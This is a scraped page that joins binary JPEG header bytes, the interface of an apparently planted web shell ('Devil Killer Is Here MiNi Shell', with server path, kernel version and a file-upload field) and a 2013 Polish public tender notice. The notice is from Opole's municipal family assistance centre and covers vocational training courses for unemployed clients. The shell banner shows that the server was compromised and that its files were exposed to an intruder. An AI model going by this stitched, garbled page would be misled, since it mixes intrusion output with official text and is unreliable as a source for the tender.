JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130904/178005-N-2013.html

<p class="kh_header"><b>Opole: Organizacja i przeprowadzenie  kursów i szkoleń  zawodowych dla 
 klientów  Miejskiego Ośrodka Pomocy Rodzinie w Opolu</b><br>
<b>Numer ogłoszenia: 178005 - 2013; data zamieszczenia: 04.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Opolu , ul. Armii Krajowej 36, 45-071 Opole, woj. opolskie, tel. 077 4005950, faks 077 4005952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie  kursów i szkoleń  zawodowych dla 
 klientów  Miejskiego Ośrodka Pomocy Rodzinie w Opolu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest organizacja i przeprowadzenie kursów i szkoleń zawodowych dla 
ok.  42 uczestników PROGRAMU AKTYWIZACJI SPOŁECZNO - ZAWODOWEJ BEZROBOTNYCH 
ORAZ NIEAKTYWNYCH ZAWODOWO KLIENTÓW MIEJSKIEGO OŚRODKA POMOCY RODZINIE 
W OPOLU, pn.: MOJA PRACA - MOJA PRZYSZŁOŚĆ realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.

Przedmiot zamówienia realizowany będzie w częściach:

ZADANIE  1
Kurs-szkolenie:  Sprzedawca z obsługą komputera,  kas fiskalnych,  terminala płatniczego 
                              i umiejętnościami fakturowania  dla 14 osób.
Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min.  160 godzin, obejmujące zagadnienia dotyczące,  m.in: bhp, form sprzedaży, obsługi klienta z wykorzystaniem aktywnych metod sprzedaży, etykę i kulturę sprzedaży, towaroznawstwa, marketingu i reklamy,  zasad rachunkowości i kontroli placówek handlowych, fakturowania komputerowego, obsługi kas fiskalnych i terminali  płatniczych, oraz nauka obsługi programów komputerowych z pakietem programów handlowych związanych z fakturowaniem i sporządzaniem dokumentacji handlowej.
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp oraz wymaganą odzież ochronną i roboczą  ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie kasjer - sprzedawca. Badania winny być wykonane przed rozpoczęciem kursu.
4.	Wystawienie książeczki zdrowia do celów sanitarnych wraz z wymaganymi badaniami dla osób, które ich nie posiadają.
5.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.  
6.	Catering każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
7.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia (np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego.

ZADANIE  2
Kurs-szkolenie: Magazynier oraz obsługa komputera, kas fiskalnych, terminala płatniczego oraz
                            obsługa  wózków jezdniowych dla 10 osób.
Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 180 godzin, obejmujące zagadnienia dotyczące, m.in:
1)	budowy i wyposażenia magazynu, technologii i organizacji prac magazynowych,  zapasy magazynowe, dokumentacja obrotów magazynowych, odpowiedzialność prawna, zastosowanie systemów komputerowych w gospodarce magazynowej, fakturowanie komputerowe, obsługi kas fiskalnych i terminala płatniczego, bhp, p.poż.- 90 godz. zajęć teoretycznych i praktycznych
2)	obsługa wózków jezdniowych (w tym widłowych)  -kierowanie wózkami jezdniowymi akumulatorowymi i spalinowymi ( z wyłączeniem specjalistycznych): wózki unoszące, naładowane, ciągnikowe, podnośnikowe, czołowe i boczne wraz ze zdobyciem uprawnień do wymiany butli z gazem przy wózkach - odrębne zaświadczenie o uprawnieniach do kierowania wózkami jezdniowymi -  90 godz. zajęć teoretycznych i praktycznych 
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp oraz wymaganą odzież ochronną i roboczą  ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie magazynier oraz kursie obsługi wózków jezdniowych. Badania winny być wykonane przed rozpoczęciem kursu.
4.	Wystawienie książeczki zdrowia do celów sanitarnych wraz z wymaganymi badaniami dla osób, które ich nie posiadają.
5.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
6.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
7.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia 
(np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego.

ZADANIE  3
Kurs-szkolenie: Opiekun osób zależnych (starszych, niepełnosprawnych oraz dzieci) z elementami 
                             języka niemieckiego  dla  13 osób.
Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 180 godzin, obejmujące:
1)	zajęcia teoretyczne :  zagadnienia dotyczące m.in: problemów społecznych osób starszych i niepełnosprawnych, choroby wieku podeszłego, zasady żywienia,  diagnozy potrzeb osób starszych, niepełnosprawnych oraz dzieci,  roli opiekuna, wykonywanie zabiegów pielęgnacyjno-higienicznych (pielęgnacja małego dziecka,  pielęgnacja ran przewlekłych, pielęgnacja chorego leżącego w łóżku), podstawowych wiadomości o zdrowiu, udzielanie pierwszej pomocy przedmedycznej, rozwiązywanie problemów opiekuńczych osób starszych i niepełnosprawnych oraz dzieci , higieny,  wychowania dziecka w środowisku instytucjonalnym, stosowanie zajęć, zabaw i gier wpływających na rozwój dziecka, łącznie - 60 godz.
2)	zajęcia praktyczne w min. 2 różnych placówkach opieki:  dla osób starszych, chorych, niepełnosprawnych oraz placówkach opieki dla małych dzieci w łącznej ilości, łącznie -  80 godz. 
Każdy uczestnik kursu-szkolenia winien odbyć praktykę w min. 2 różnych placówkach opieki 
( dla starszych i dla dzieci).
3)	elementy języka niemieckiego w ilości, łącznie - 40 godz. zajęć.
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp oraz wymaganą odzież ochronną i roboczą  ( na własność każdego uczestnika). 
Wykonawca zapewni odpowiednio wyposażoną salę wykładową oraz wszelkie materiały i sprzęt niezbędny do realizacji kursu - szkolenia (fantomy, materiały opatrunkowe, zestawy do wykonywania różnych zabiegów pielęgnacyjno-higienicznych).
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie opiekun osób zależnych. Badania winny być wykonane przed rozpoczęciem kursu.
4.	Wystawienie książeczki zdrowia do celów sanitarnych wraz z wymaganymi badaniami dla osób, które ich nie posiadają.
5.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
6.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
7.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia (np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego - w języku polskim oraz
 j. angielskim lub niemieckim (do wyboru przez uczestnika).
8.	Zaświadczenie z odbytej praktyce w zawodzie opiekuna osób zależnych.

ZADANIE  4    
Kurs-szkolenie:  Księgowość I i II stopnia dla 1 osoby.
Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 250 godz.  obejmujące zagadnienia
dotyczące m.in:
1)	Podstawowych zasad rachunkowości, budowy konta księgowego, rodzajów dowodów księgowy, ewidencji zdarzeń gospodarczych, zasad ewidencji gospodarczych, księgowania dowodów księgowych, ustalania wyniku finansowego, wybranych zagadnień z rozliczeń publiczno  -  prawnych, zastosowania techniki komputerowej w rachunkowości, ćwiczenia praktyczne z wykorzystaniem komputerowych programów księgowych - I st. - min. 80 godz.  zajęć teoretycznych i praktycznych,
2)	organizacji rachunkowości, budowy planu kont, prowadzenia ksiąg rachunkowych, klasyfikacji rozrachunków, ewidencji rozrachunków z różnych tytułów, gospodarki materiałowej przedsiębiorstwa, zamknięcia ksiąg rachunkowych, sprawozdawczości finansowej, prawa podatkowego, prawa gospodarczego, prawa pracy i prawa cywilnego - II st. - min. 170 godz.  zajęć teoretycznych i praktycznych
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp   ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie księgowości. Badania winny być wykonane przed rozpoczęciem kursu.
4.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
5.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
6.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia (np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego oraz Certyfikatu Księgowego potwierdzającego zaliczenie I stopnia na ścieżce edukacyjnej certyfikacji zawodu księgowego oraz Certyfikatu Specjalisty ds. Rachunkowości potwierdzającego zdobycie wiedzy i  umiejętności ujętych w założeniach programowych kursu II stopnia ( na podstawie pozytywnie zdanych egzaminów).      
7.	W przypadku, gdy osoba uczestnicząca w kursie księgowości I stopnia nie zda egzaminu  potwierdzającego zaliczenie I stopnia na ścieżce edukacyjnej certyfikacji zawodu księgowego,
nie będzie ona mogła uczestniczyć w kursie księgowości II stopnia - tym samym kurs księgowości II stopnia nie odbędzie się.







ZADANIE  5  
Kurs-szkolenie:  Pracownik administracyjno - biurowy z obsługą sekretariatu i kancelarii dla 1 osoby.

Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 160 godz.  obejmujące zagadnienia
dotyczące m.in: organizacji pracy biurowej, przepływu informacji w zarządzaniu biurem, zasad efektywnej komunikacji, organizacji i zarządzania, charakterystyki pracy w sekretariacie, prowadzenia dokumentacji sekretariatu, sprawnego komunikowania się w sekretariacie, obiegu 
dokumentów oraz korespondencji w firmie, kultury i estetyki pracy biurowej, psychologii pracy, zagadnień prawnych - prawo pracy,  obsługi urządzeń biurowych (centrala telefoniczna, fax, ksero, skaner, drukarka, urządzenie wielofunkcyjne, itp.),  praktyczna obsługa komputera (Word, Exel,  Outlook, Internet).
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp   ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie: pracownik administracyjno-biurowy. Badania winny być wykonane przed rozpoczęciem kursu.
4.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
5.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
6.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia
(np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego.

ZADANIE  6    
Kurs-szkolenie:   Grafik komputerowy  dla 1 osoby.

       Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 120 godz. zajęć teoretycznych i praktycznych obejmujące zagadnienia dotyczące m.in: profesjonalnej obsługi  min. 3 programów: Adobe Photoshop, Corel Draw i Adobe Illustrator ,  oraz zasad projektowania graficznego, wykorzystywanie grafiki komputerowej  na potrzeby www, reklamy i marketingu, poligrafii, prezentacje multimedialne, itp.
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp   ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie: grafik komputerowy.  Badania winny być wykonane przed rozpoczęciem kursu.
4.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
5.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
6.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia
 (np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego.




ZADANIE  7    
Kurs-szkolenie:   Kurs kroju i szycia oraz  modelowania odzieży dla 1 osoby.
     
  Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 120 godz. zajęć teoretycznych i praktycznych obejmujące zagadnienia dotyczące m.in: szycie ręczne i maszynowe - ściegi i detale odzieżowe 
(min. overlock), zdejmowanie wymiarów sylwetki, krojenie elementów odzieży, modelowanie odzieży, skomplikowane formy odzieży, szycie sukienek,  garniturów, garsonek, płaszczy, kurtek ze szczególnym uwzględnieniem modelowania i szycia odzieży  ze skóry i materiałów skóropodobnych, stylizacja odzieży, wykańczanie odzieży, przeróbki krawieckie.
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp   ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie krawieckim.  Badania winny być wykonane przed rozpoczęciem kursu.
4.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
5.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
6.	Przeprowadzenie egzaminu wewnętrznego i wydanie zaświadczeń o ukończeniu kursu-szkolenia (np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego.      

ZADANIE  8 
Kurs-szkolenie:   Operator koparko - ładowarki (wszystkie typy) kl. III  dla 1 osoby.
    
  Wykonawca winien zapewnić:
1.	Szkolenie teoretyczne i praktyczne  w ilości min. 202 godz. zajęć teoretycznych i praktycznych
( 116 godz. teoretycznych, 60 godz. praktycznych, 26 godz. stażu wstępnego) obejmujące zagadnienia dotyczące BHP przy obsłudze koparko-ładowarki, użytkowanie eksploatacyjne, dokumentację techniczną, podstawy elektrotechniki, elementy hydrauliki, silniki spalinowe, budowę maszyny, technologię robót i zajęcia praktyczne.
2.	Materiały szkoleniowe w formie podręczników, skryptów, itp oraz wymaganą odzież ochronną i roboczą  ( na własność każdego uczestnika). 
3.	Badania lekarskie  wykonane przez lekarza medycyny pracy  wraz z wydaniem zaświadczenia o braku przeciwwskazań do uczestnictwa w kursie operatora koparko - ładowarki.  Badania winny być wykonane przed rozpoczęciem kursu.
4.	Ubezpieczenie osób biorących udział w kursie-szkoleniu od następstw nieszczęśliwych 
wypadków powstałych w związku z kursem-szkoleniem oraz w drodze do miejsca szkolenia- 
kursu i z powrotem. Suma ubezpieczenia nie mniejsza niż 10.000,00 zł na1 ubezpieczonego.   
5.	Catering  każdemu uczestnikowi kursu-szkolenia  w postaci:
a) serwisu kawowego podczas przerwy w zajęciach ( teoretycznych i praktycznych): kawa, herbata, soki owocowe, woda mineralna, kruche ciasteczka, wafelki, cukierki, itp.
             b) ciepłego posiłku: drugie danie - ziemniaki (lub ryż, makaron, kluski, itp.), mięso lub ryby, 
       surówka, sosy -  w pojemnikach  jednorazowych, sztućce ( urozmaicone ).
6.	Wydanie zaświadczeń o ukończeniu kursu-szkolenia (np. świadectwa na drukach MEN) - wydanie dodatkowego zaświadczenia z informacją, że szkolenie było współfinansowane ze środków Europejskiego Funduszu Społecznego.      
7.	Przeprowadzenie egzaminu  państwowego i wydanie świadectwa oraz Książeczki Operatora z odpowiednim wpisem rodzaju uzyskanych uprawnień ( na podstawie pozytywnie zdanego egzaminu) a także zaświadczenia o odbytym stażu.      


Z uwagi na możliwość rezygnacji uczestnika projektu lub zmiany kursu-szkolenia zawodowego, Zamawiający w każdym zadaniu,  zastrzega sobie możliwość zmiany ilości uczestników.
Lista  uczestników każdego kursu-szkolenia będzie przekazana Wykonawcy na 3 dni  robocze przed terminem jego rozpoczęcia. 
Wszystkie kursy-szkolenia odbędą się na terenie miasta Opola.

Zajęcia teoretyczne i praktyczne w ramach każdego kursu-szkolenia  winny odbywać się w dniach roboczych, po  4 - 8 godzin zajęć teoretycznych lub praktycznych dziennie, w godzinach:  8,00  - 17,00. 
1 godz. zajęć  teoretycznych - 45 min.
1 godz. zajęć praktycznych - 60 min.
(np.: kurs 160 godz. :  max. 8 godz. zajęć dziennie =  min. 20 dni szkoleniowych)


II. Przy organizacji i realizacji kursów i szkoleń  wszystkich części zamówienia Wykonawca usług obowiązany będzie do:
1	Zapewnienia  odpowiednio wyposażonych sal wykładowych oraz  pomieszczeń i terenu do   
      praktycznej nauki zawodu (w tym: maszyny,  narzędzia, materiały, fantomy, sprzęt i zestawy do 
      wykonywania czynności podczas zajęć praktycznych, itp.).
      2.   Zapewnienia warunków pracy zgodnie z przepisami bezpieczeństwa i higieny pracy  
      3.   Zapewnienia osób bezpośrednio uczestniczących w realizacji zamówienia (nauczycieli,  
            wykładowców)  z odpowiednim wykształceniem, umiejętnościami i doświadczeniem 
            dostosowanym do tematyki kursów- szkoleń.
4.	Zapewnienie osoby odpowiedzialnej za organizację kursu-szkolenia i jej prawidłowy przebieg oraz prowadzenie bieżącej dokumentacji związanej z kursem - szkoleniem, która będzie stale dostępna w miejscu odbywania się kursu-szkolenia ( może to być osoba prowadząca zajęcia).
5.	Opracowania szczegółowych programów i harmonogramów kursów -szkoleń. Szczegółowe programy  i harmonogramy zajęć dla każdego kursu zostaną opracowane przez  Wykonawcę i przedstawione Zamawiającemu do akceptacji w terminie do 5 dni od dnia podpisania umowy. Zamawiający nie dopuszcza łączenia zajęć w ramach realizacji dwóch lub więcej kursów-szkoleń.
6.	Prowadzenia dokumentacji związanej z realizacją usługi i przekazanie jej Zamawiającemu po wykonaniu zamówienia:
1)	oryginały potwierdzenia odbioru przez uczestnika kursu-szkolenia materiałów szkoleniowych i pomocy dydaktycznych oraz odzieży ochronnej lub roboczej ( jeżeli dotyczy),
2)	kopii zaświadczeń lekarskich oraz wydanych książeczek zdrowia do celów sanitarnych ( jeżeli dotyczy), potwierdzonych przez Wykonawcę za zgodność z oryginałem,
3)	kopii polisy ubezpieczeniowej  wraz z listą osób objętych ubezpieczeniem, potwierdzonej przez Wykonawcę za zgodność z oryginałem, 
4)	dziennych potwierdzeń odbioru cateringu przez uczestników kursu-szkolenia w oryginale, 
5)	kserokopii dziennika zajęć potwierdzonej przez Wykonawcę za zgodność z oryginałem, 
6)	kserokopii zaświadczeń o ukończeniu kursu-szkolenia w języku polskim oraz j. angielskim 
lub niemieckim (jeżeli dotyczy), zaświadczeń o odbyciu stażu lub praktyki ( jeżeli dotyczy) poświadczonych za zgodność przez Wykonawcę oraz kopii rejestru wydanych zaświadczeń,
7)	dokumentacji fotograficznej z przebiegu kursu-szkolenia nagranej na nośnik CD.
7.	Bieżącego informowania Zamawiającego o nieusprawiedliwionej nieobecności na zajęciach w ramach kursu-szkolenia,  nie zgłoszeniu się na zajęcia lub rezygnacji uczestnika z kursu-szkolenia w trakcie jego trwania.
